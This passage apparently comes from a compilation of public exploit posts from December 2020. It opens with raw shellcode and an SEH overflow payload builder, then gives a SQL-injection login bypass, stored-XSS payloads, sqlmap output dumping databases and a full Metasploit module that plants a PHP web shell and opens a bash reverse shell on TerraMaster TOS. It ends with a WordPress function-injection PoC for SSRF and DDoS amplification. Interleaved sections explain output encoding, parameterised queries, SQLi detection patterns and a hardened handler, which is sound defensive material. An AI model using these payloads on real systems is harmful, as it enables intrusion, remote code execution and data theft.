shellcode =  ""
shellcode += "\xda\xc7\xba\xee\x50\x53\xe0\xd9\x74\x24\xf4"
shellcode += "\x5d\x33\xc9\xb1\x52\x83\xed\xfc\x31\x55\x13"
shellcode += "\x03\xbb\x43\xb1\x15\xbf\x8c\xb7\xd6\x3f\x4d"
shellcode += "\xd8\x5f\xda\x7c\xd8\x04\xaf\x2f\xe8\x4f\xfd"
shellcode += "\xc3\x83\x02\x15\x57\xe1\x8a\x1a\xd0\x4c\xed"
shellcode += "\x15\xe1\xfd\xcd\x34\x61\xfc\x01\x96\x58\xcf"
shellcode += "\x57\xd7\x9d\x32\x95\x85\x76\x38\x08\x39\xf2"
shellcode += "\x74\x91\xb2\x48\x98\x91\x27\x18\x9b\xb0\xf6"
shellcode += "\x12\xc2\x12\xf9\xf7\x7e\x1b\xe1\x14\xba\xd5"
shellcode += "\x9a\xef\x30\xe4\x4a\x3e\xb8\x4b\xb3\x8e\x4b"
shellcode += "\x95\xf4\x29\xb4\xe0\x0c\x4a\x49\xf3\xcb\x30"
shellcode += "\x95\x76\xcf\x93\x5e\x20\x2b\x25\xb2\xb7\xb8"
shellcode += "\x29\x7f\xb3\xe6\x2d\x7e\x10\x9d\x4a\x0b\x97"
shellcode += "\x71\xdb\x4f\xbc\x55\x87\x14\xdd\xcc\x6d\xfa"
shellcode += "\xe2\x0e\xce\xa3\x46\x45\xe3\xb0\xfa\x04\x6c"
shellcode += "\x74\x37\xb6\x6c\x12\x40\xc5\x5e\xbd\xfa\x41"
shellcode += "\xd3\x36\x25\x96\x14\x6d\x91\x08\xeb\x8e\xe2"
shellcode += "\x01\x28\xda\xb2\x39\x99\x63\x59\xb9\x26\xb6"
shellcode += "\xce\xe9\x88\x69\xaf\x59\x69\xda\x47\xb3\x66"
shellcode += "\x05\x77\xbc\xac\x2e\x12\x47\x27\x91\x4b\x54"
shellcode += "\x36\x79\x8e\x5a\x39\xc1\x07\xbc\x53\x25\x4e"
shellcode += "\x17\xcc\xdc\xcb\xe3\x6d\x20\xc6\x8e\xae\xaa"
shellcode += "\xe5\x6f\x60\x5b\x83\x63\x15\xab\xde\xd9\xb0"
shellcode += "\xb4\xf4\x75\x5e\x26\x93\x85\x29\x5b\x0c\xd2"
shellcode += "\x7e\xad\x45\xb6\x92\x94\xff\xa4\x6e\x40\xc7"
shellcode += "\x6c\xb5\xb1\xc6\x6d\x38\x8d\xec\x7d\x84\x0e"
shellcode += "\xa9\x29\x58\x59\x67\x87\x1e\x33\xc9\x71\xc9"
shellcode += "\xe8\x83\x15\x8c\xc2\x13\x63\x91\x0e\xe2\x8b"
shellcode += "\x20\xe7\xb3\xb4\x8d\x6f\x34\xcd\xf3\x0f\xbb"
shellcode += "\x04\xb0\x30\x5e\x8c\xcd\xd8\xc7\x45\x6c\x85"
shellcode += "\xf7\xb0\xb3\xb0\x7b\x30\x4c\x47\x63\x31\x49"
shellcode += "\x03\x23\xaa\x23\x1c\xc6\xcc\x90\x1d\xc3"

payload = 'A' * (OFFSET - len(short_jump))
payload += short_jump
payload += pop_pop_ret
payload += '\x90' * 8
payload += shellcode

f = open("exploit.txt", "w")
f.write(payload)
f.close()
  20. # Exploit Title: Online Learning Management System 1.0 - Authentication Bypass
# Exploit Author: Aakash Madaan (Godsky)
# Date: 2020-12-22
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS
# Description: An easy authentication bypass vulnerability in the application allows an attacker to log in as a registered user without the password.

Step 1: Go to http://localhost/ and register a new user, or try to login as an already registered user (Ubas).
Step 2: On the login page, use the query { Ubas' or '1'='1 } as the username.
Step 3: On the login page, use the same query { Ubas' or '1'='1 } as the password.

All set; you should be logged in as Ubas.
  21. # Exploit Title: Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS
# Exploit Author: Vijay Sachdeva (pwnshell)
# Date: 2020-12-23
# Vendor Homepage: https://www.sourcecodester.com/php/11238/sales-and-inventory-system-grocery-store.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11238&title=Sales+and+Inventory+System+for+Grocery+Store+using+PHP%2FPDO+Full+Source+Code
# Tested on Kali Linux

Step 1: Log in to the application with admin credentials.
Step 2: Click on "Customer" on the left side, then click "Add Customer".
Step 3: Input "<IMG """><SCRIPT>alert("XSS")</SCRIPT>">" in the "First Name" field of the "Add Customer" form.
Step 4: Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on the "Customer" page, your XSS payload will be triggered.

Note: Stored XSS can also be found on the "Product" page: select any product and then go to "Action" to edit it. Input your payload "<IMG"""><SCRIPT>alert("XSS")</SCRIPT>">" in any of the fields and your XSS payload will trigger.
  22. # Exploit Title: Online Learning Management System 1.0 - Multiple Stored XSS
# Exploit Author: Aakash Madaan (Godsky)
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

[+] Step 1. Login to the application with admin credentials

[+] Step 2.1
    (a). Click on "Subject" page. {Uri : http(s)://<host>/admin/subject.php}
    (b). Now click on the "Add Subject" button to add a new subject.
    (c). In the "Subject Title" field, use XSS payload '"><script>alert("subject")</script>' as the name of the new subject (also fill the respective sections if required).
    (d). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on the "Subject" section, your XSS payloads will be triggered.

[+] Step 2.2
    (a). Click on "Class" page. {Uri : http(s)://<host>/admin/class.php}
    (b). Under "Add class", in the "Class Name" field, use XSS payload '"><script>alert("class")</script>' as the name of the new class.
    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on the "Class" section, your XSS payloads will be triggered.

[+] Step 2.3
    (a). Click on "Admin Users" page. {Uri : http(s)://<host>/admin/admin_user.php}
    (b). Under "Add user", in the "First Name" field, use XSS payload '"><script>alert("Admin User")</script>' as the name of the new user (also fill the respective sections if required).
    [ Note : The XSS can also be triggered if we put the same payload in the "Last Name" or "Username" fields ]
    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Admin Users", your XSS payloads will be triggered.

[+] Step 2.4
    (a). Click on "Department" page. {Uri : http(s)://<host>/admin/department.php}
    (b). In the "Department" field, use XSS payload '"><script>alert("Department")</script>' as the name of the new department (also fill the respective sections if required).
    [ Note : The XSS can also be triggered if we put the same payload in the "Person Incharge" field ]
    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Department", your XSS payloads will be triggered.

[+] Step 2.5
    (a). Click on "Students" page. {Uri : http(s)://<host>/admin/students.php}
    (b). Under "Add Student", in the "First Name" field, use XSS payload '"><script>alert("students")</script>' as the name of the new student (also fill the respective sections if required).
    [ Note : The XSS can also be triggered if we put the same payload in the "Last Name" field ]
    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Students", your XSS payloads will be triggered.

[+] Step 2.6
    (a). Click on "Teachers" page. {Uri : http(s)://<host>/admin/teachers.php}
    (b). Under "Add Student", in the "First Name" field, use XSS payload '"><script>alert("students")</script>' as the name of the new entry (also fill the respective sections if required).
    [ Note : The XSS can also be triggered if we put the same payload in the "Last Name" field ]
    (c). Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on "Teachers", your XSS payloads will be triggered.

[+] Step 3. This should trigger the XSS payload, and any time you click on the respective pages, your stored XSS payloads will be triggered.
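Every stored-XSS post on this page (items 9, 12, 17, 18, 21 and 22) has the same shape: a value saved from a form is later written straight into an HTML page, so a payload such as `"><img src onerror=alert(1)>` closes the attribute it was placed in and opens a tag of its own. The following is an added example (not code from any of those applications or their posters) contrasting that pattern with the fix: encode once, at output time, for the context the value lands in. The row template is constructed for the demonstration.

```python
import html

# Constructed template: the stored value appears both as element text and
# inside a quoted attribute, the two contexts the vulnerable pages use.
ROW_TEMPLATE = '<tr><td>{name}</td><td><input type="text" value="{name}"></td></tr>'


def render_row_unsafe(name: str) -> str:
    """The pattern behind the stored XSS above: the stored value is pasted verbatim."""
    return ROW_TEMPLATE.format(name=name)


def render_row_safe(name: str) -> str:
    """Encode at output time for both text and attribute context.

    html.escape(..., quote=True) turns & < > " ' into entities, so a stored
    value can neither open a tag nor close the value="..." attribute. The
    database still holds the original string; nothing is "sanitised" on input.
    """
    return ROW_TEMPLATE.format(name=html.escape(name, quote=True))


def breaks_out(rendered: str) -> bool:
    """Demo check: does the output contain a tag the template itself never emits?"""
    lowered = rendered.lower()
    return "<img" in lowered or "<script" in lowered


if __name__ == "__main__":
    # Payloads quoted in the posts above.
    for payload in ('"><img src onerror=alert(1)>', '<script>alert("pwnshell")</script>'):
        print("unsafe breaks out:", breaks_out(render_row_unsafe(payload)))
        print("safe   breaks out:", breaks_out(render_row_safe(payload)))
        print(render_row_safe(payload))
```

Because the encoding is applied where the value is written out, the same stored string is safe on every page that displays it, which is exactly the property the multi-page posts above show the original applications lack. A Content-Security-Policy that disallows inline script is a worthwhile second layer, but it does not replace output encoding.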
  23. # Exploit Title: Online Learning Management System 1.0 - 'id' SQL Injection
# Exploit Author: Aakash Madaan (Godsky)
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application
# Tested on: Parrot OS

Step 1. Login to the application with admin credentials
Step 2. Click on "Departments" page.
Step 3. Choose any event and select "edit". The URL should be "http(s)://<host>/admin/edit_department.php?id=4"
Step 4. Capture the request to the "edit" event page in Burp Suite.
Step 5. Save the captured request and run sqlmap on it using "sqlmap -r request --time-sec=5 --dbs"

---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=4' AND (SELECT 7775 FROM (SELECT(SLEEP(5)))vwwE) AND 'OoVY'='OoVY

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-9296' UNION ALL SELECT NULL,NULL,CONCAT(0x716a707871,0x64766351487955536b5276427a5a416a764e6a4b46476a57704f6d73425368544153494e53525970,0x716a716a71)-- -
---
[16:01:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[16:01:08] [INFO] fetching database names
[16:01:12] [INFO] retrieved: 'information_schema'
[16:01:13] [INFO] retrieved: 'mysql'
[16:01:15] [INFO] retrieved: 'performance_schema'
[16:01:16] [INFO] retrieved: 'css'
[16:01:18] [INFO] retrieved: 'sales_inventory_db'
[16:01:19] [INFO] retrieved: 'rios_db'
[16:01:19] [INFO] retrieved: 'capstone'
available databases [7]:
[*] capstone
[*] css
[*] information_schema
[*] mysql
[*] performance_schema
[*] rios_db
[*] sales_inventory_db

Step 6. Sqlmap should inject the web-app successfully, which leads to information disclosure.
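Items 10, 11, 15, 20 and 23 above are all one bug: a request value is spliced into the SQL text, so `'` ends the intended literal. The following is an added example (not code from any of those applications or their posters) that reproduces the two effects shown in the posts, the syntax error from `pubid=4'` and the `Ubas' or '1'='1` login bypass, against a constructed in-memory SQLite stand-in for the MySQL tables, then shows the parameterised and type-checked versions, and finishes with detection signatures matched against the sqlmap payloads the posts quote. SQLite is used only so the example runs offline; the query-building mistake and its fix are the same for MySQL.

```python
import re
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the applications' tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Ubas', 'constructed-secret')")
    conn.execute("CREATE TABLE books (isbn TEXT, pubid INTEGER, title TEXT)")
    conn.execute("INSERT INTO books VALUES ('978-1-1180-2669-4', 4, 'Constructed title')")
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the pattern the auth-bypass post above defeats."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Bound parameters: the input is data to the driver, never SQL text."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()


def books_by_publisher_vulnerable(conn, pubid):
    """pubid=4' yields the unterminated-literal error the bookPerPub.php post shows."""
    sql = f"SELECT isbn, title FROM books WHERE pubid='{pubid}'"
    return conn.execute(sql).fetchall()


def books_by_publisher_safe(conn, pubid):
    """Type-check first (pubid is numeric), then bind."""
    pubid_int = int(pubid)  # "4'" raises ValueError before any SQL is built
    sql = "SELECT isbn, title FROM books WHERE pubid=?"
    return conn.execute(sql, (pubid_int,)).fetchall()


# Detection side: patterns matching the automated payloads quoted in the posts.
SQLI_SIGNATURES = [
    re.compile(r"\bsleep\s*\(", re.I),                 # time-based blind
    re.compile(r"\bunion\s+all\s+select\b", re.I),     # UNION extraction
    re.compile(r"'\s*(or|and)\s*(not\s*)?['\d]", re.I),  # tautology after a closed quote
    re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I),  # sqlmap hex markers
]


def looks_like_sqli(value: str) -> bool:
    """Cheap screen for a decoded request parameter; a WAF-style first pass, not proof."""
    return any(sig.search(value) for sig in SQLI_SIGNATURES)


def run_demo() -> dict:
    """Exercise both query styles with the posts' inputs and report the outcomes."""
    conn = make_demo_db()
    bypass = "Ubas' or '1'='1"
    try:
        books_by_publisher_vulnerable(conn, "4'")
        vulnerable_books = "no error"
    except sqlite3.OperationalError:
        vulnerable_books = "syntax error"
    try:
        books_by_publisher_safe(conn, "4'")
        safe_books = "no error"
    except ValueError:
        safe_books = "rejected before SQL"
    return {
        "vulnerable_login": login_vulnerable(conn, bypass, bypass),
        "safe_login": login_safe(conn, bypass, bypass),
        "vulnerable_books": vulnerable_books,
        "safe_books": safe_books,
        "safe_books_valid": books_by_publisher_safe(conn, "4"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

The login bypass works in the vulnerable version because `AND` binds tighter than `OR`, so the condition becomes `username='Ubas' OR (...) OR '1'='1'` and is true for every row; the bound-parameter version compares the whole string `Ubas' or '1'='1` against the username column and finds nothing. The detection patterns are deliberately narrow so they can be run over decoded query strings in access logs without flooding on ordinary apostrophes.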
24. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution",
      'Description'    => %q(
        This module exploits an unauthenticated command execution vulnerability in TerraMaster TOS.
        The "Event" parameter in "include/makecvs.php" contains a vulnerability.
        "filename" is executing command on system during ".csv" creation.
        In order to do this, it is not necessary to have a session in the application.
        Therefore an unauthenticated user can execute the command on the system.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # PoC & Metasploit module
          'IHTeam'                        # Discovery
        ],
      'References'     =>
        [
          ['CVE', '2020-'],
          ['URL', 'http://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html'],
          ['URL', 'https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/']
        ],
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Automatic', {}]],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 12 2020",
      'DefaultTarget'  => 0,
      'DefaultOptions' =>
        {
          'RPORT'   => 8181,
          'SSL'     => false,
          'PAYLOAD' => 'cmd/unix/reverse_perl'
        }))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Base ERP directory path", '/'])
      ])
  end

  def run_cmd(file, cmd)
    res = send_request_cgi({
      'method' => 'POST',
      'ctype'  => 'application/x-www-form-urlencoded',
      'uri'    => normalize_uri(target_uri.path, "#{file}"),
      'data'   => "cmd=#{cmd}"
    })
  end

  def upload_shell
    sname = Rex::Text.rand_text_alpha_lower(8) + ".php"
    payload_post = "http|echo \"<?php echo(passthru(\\$_REQUEST['cmd']));?>\" >> /usr/www/#{sname} && chmod +x /usr/www/#{sname}||"
    @b64p = Rex::Text.encode_base64(payload.encoded)
    perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
    payload = Rex::Text.uri_encode(perl_payload)

    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "include", "makecvs.php"),
      'vars_get' => {
        'Event' => "#{payload_post}",
      }
    )

    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, "#{sname}"),
      'vars_post' => {
        'cmd' => 'id'
      }
    )

    if res && res.code == 200 && res.body.include?('uid=')
      print_good("Upload completed successfully and command executed!")
      run_cmd("#{sname}", payload)
    else
      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
    end
  end

  def exploit
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    upload_shell
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "version"),
    )
    if res && res.code == 200 && res.body
      version = res.body.split(".0_")[1]
      print_status("Version : " + res.body)
      return CheckCode::Detected if version.nil?
      version = version.split(".").join('')
      if version <= "4206"
        return CheckCode::Vulnerable
      else
        return CheckCode::Safe
      end
    end
  end
end
25. # Exploit Title: Wordpress Epsilon Framework Multiple Themes - Unauthenticated Function Injection
# Date: 22/12/2020
# Exploit Authors:
#   gx1 <g.per45[at]gmail.com>
#   lotar <Giuseppe.DiTerlizzi[at]nttdata.com>
# Vendor Homepage: https://wordpress.com/
# Software Link: https://github.com/WordPress/WordPress
# Affected Themes:
#   shapely - Fixed in version 1.2.9
#   newsmag - Fixed in version 2.4.2
#   activello - Fixed in version 1.4.2
#   illdy - Fixed in version 2.1.7
#   allegiant - Fixed in version 1.2.6
#   newspaper-x - Fixed in version 1.3.2
#   pixova-lite - Fixed in version 2.0.7
#   brilliance - Fixed in version 1.3.0
#   medzone-lite - Fixed in version 1.2.6
#   regina-lite - Fixed in version 2.0.6
#   transcend - Fixed in version 1.2.0
#   affluent - Fixed in version 1.1.2
#   bonkers - Fixed in version 1.0.6
#   antreas - Fixed in version 1.0.7
#   naturemag-lite - No known fix
# Tested on: Wordpress 5.6
# CVE : N/A
# References:
# - https://wpscan.com/vulnerability/10417
# - https://blog.nintechnet.com/unauthenticated-function-injection-vulnerability-fixed-in-15-wordpress-themes/
# - https://www.wordfence.com/blog/2020/11/large-scale-attacks-target-epsilon-framework-themes/
# - https://developer.wordpress.org/reference/classes/requests/request_multiple/

Description:
Fifteen WordPress themes use a version of epsilon-framework that is vulnerable to a critical unauthenticated function injection vulnerability, due to the lack of capability and CSRF nonce checks in AJAX actions.

Technical Details:
The vulnerability is present in the epsilon_framework_ajax_action AJAX action, which is accessible to all users, authenticated or not. The function takes three POST user inputs, assigns them to the $class, $method and $args variables and calls the class method with the arguments:

================================================================
public function epsilon_framework_ajax_action() {
    if ( 'epsilon_framework_ajax_action' !== $_POST['action'] ) {
        wp_die( json_encode( array(
            'status' => false,
            'error'  => 'Not allowed',
        ) ) );
    }
    if ( count( $_POST['args']['action'] ) !== 2 ) {
        wp_die( json_encode( array(
            'status' => false,
            'error'  => 'Not allowed',
        ) ) );
    }
    if ( ! class_exists( $_POST['args']['action'][0] ) ) {
        wp_die( json_encode( array(
            'status' => false,
            'error'  => 'Class does not exist',
        ) ) );
    }

    $class  = $_POST['args']['action'][0];
    $method = $_POST['args']['action'][1];
    $args   = $_POST['args']['args'];

    $response = $class::$method( $args );
================================================================

The nonce is checked only if it is set. As it is possible to observe, the vulnerability can be exploited if the attacker is able to use a class that contains a public static method that accepts an array argument. Useful methods should be investigated in the context of the targeted website, because they could depend on the installed plugins and themes.

On a wordpress instance, it is possible to store the list of classes containing public static methods by adding this code in the epsilon_framework_ajax_action function:

================================================================
function testClasses() {
    error_log("[+] IN TEST CLASSES");
    mkdir("/tmp/classes");
    foreach(get_declared_classes() as $c) {
        mylog($c);
        $f = fopen('/tmp/classes/'.$c, 'w');
        $reflection = new ReflectionClass($c);
        $staticMethods = $reflection->getMethods(ReflectionMethod::IS_STATIC);
        foreach($staticMethods as $sm) {
            mylog($sm);
            fwrite($f, $sm . "\n");
        }
        fclose($f);
    }
}
testClasses();
================================================================

We have found the Requests::request_multiple static method (array $requests) in the core of Wordpress that can be used to send arbitrary HTTP requests, with critically dangerous effects for the vulnerable target.

Proof Of Concept:
The following code:

================================================================
<html>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
    console.log("document ready");
    var ajax_url = "<vulnerable-wordpress-ip>/wp-admin/admin-ajax.php"
    var data = {
        'action': 'epsilon_framework_ajax_action',
        'args': {
            'action': ["Requests", "request_multiple"],
            'args' : [{"url": "<poc-website>"}]
        }
    }
    $.post(ajax_url, data, function(response) {
        console.log("in response")
    });
});
</script>
</html>
================================================================

sends a request to <poc-request>:

================================================================
<vulnerable-wordpress-ip>- - [22/Dec/2020:18:36:51 +0000] "GET / HTTP/1.1" 200 3898 "<poc-website>" "php-requests/1.7-3470169"
================================================================

Impacts:
1. DDOS amplification against a target: the attacker can exploit vulnerable wordpress sites to send ajax requests with an args array containing multiple occurrences of the target. In this way, he can perform an amplification attack against a target website.

   var data = {
       'action': 'epsilon_framework_ajax_action',
       'args': {
           'action': ["Requests", "request_multiple"],
           'args' : [{"url": "<target>"}, {"url": "<target>"}, {"url": "<target>"}, ...]
       }
   }

2. SSRF: the attacker can exploit the Requests::request_multiple method to perform a Server-Side Request Forgery and obtain access to the internal network through the vulnerable Wordpress site.

3. Wordpress DoS: if the attacker creates a specific POST request that contains a request to "/wp-admin/admin-ajax.php" as data, he may be able to create an internal loop that crashes the Wordpress site.

Solution:
In Affected Themes we show the fixed versions.
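The root cause named in the description (no nonce check, no capability check, only a `class_exists()` test) as a hardened handler. This is an added example and not the Epsilon Framework's own code; the nonce name `epsilon_ajax_nonce`, the `edit_theme_options` capability, the `Epsilon_Ajax_Hardened` class and the allowlisted handler names are assumptions.

```php
<?php
// Added example, not the Epsilon Framework's own code: a hardened version of the
// AJAX handler quoted above. The original only checks class_exists(); this version
// requires a valid nonce, a capability, and an allowlisted class::method pair.
// The nonce name, capability and allowlist entries are assumptions for illustration.

class Epsilon_Ajax_Hardened {

    // Only the class::method pairs the theme really needs may be invoked.
    // Placeholder entries; a real theme would list its own handlers here.
    const ALLOWED_ACTIONS = array(
        'Epsilon_Example_Handler::save_option',
        'Epsilon_Example_Handler::reset_option',
    );

    public static function epsilon_framework_ajax_action() {
        // 1. CSRF protection: a missing or invalid nonce terminates the request (HTTP 403).
        check_ajax_referer( 'epsilon_ajax_nonce', 'nonce' );

        // 2. Capability check before any user-controlled value is touched.
        if ( ! current_user_can( 'edit_theme_options' ) ) {
            wp_send_json_error( array( 'error' => 'Not allowed' ), 403 );
        }

        // 3. Validate the shape of the input: exactly two string elements.
        $action = isset( $_POST['args']['action'] ) ? array_values( (array) $_POST['args']['action'] ) : array();
        if ( 2 !== count( $action ) || ! is_string( $action[0] ) || ! is_string( $action[1] ) ) {
            wp_send_json_error( array( 'error' => 'Not allowed' ), 400 );
        }

        // 4. Allowlist: compare against fixed strings, so Requests::request_multiple
        //    (or any other class with a public static method) is never reachable.
        $callable = $action[0] . '::' . $action[1];
        if ( ! in_array( $callable, self::ALLOWED_ACTIONS, true ) ) {
            wp_send_json_error( array( 'error' => 'Not allowed' ), 400 );
        }

        $args     = isset( $_POST['args']['args'] ) ? wp_unslash( (array) $_POST['args']['args'] ) : array();
        $response = call_user_func( $callable, $args );

        wp_send_json_success( $response );
    }
}

// Registered for logged-in users only. No wp_ajax_nopriv_ hook: the action the
// advisory describes as reachable "authenticated or not" must not be exposed to guests.
add_action( 'wp_ajax_epsilon_framework_ajax_action',
    array( 'Epsilon_Ajax_Hardened', 'epsilon_framework_ajax_action' ) );
```

With this shape the PoC request above fails at the nonce check before `$_POST['args']` is ever read, and even a request carrying a valid nonce cannot name a class outside the allowlist.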